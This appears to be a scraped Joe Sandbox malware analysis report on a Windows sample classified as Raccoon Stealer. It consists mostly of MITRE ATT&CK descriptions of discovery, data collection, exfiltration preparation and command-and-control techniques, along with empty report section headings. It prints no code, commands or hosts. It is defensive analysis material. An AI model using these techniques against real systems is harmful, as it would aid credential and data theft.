Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report KnZsSmDyF3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Raccoon Stealer

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre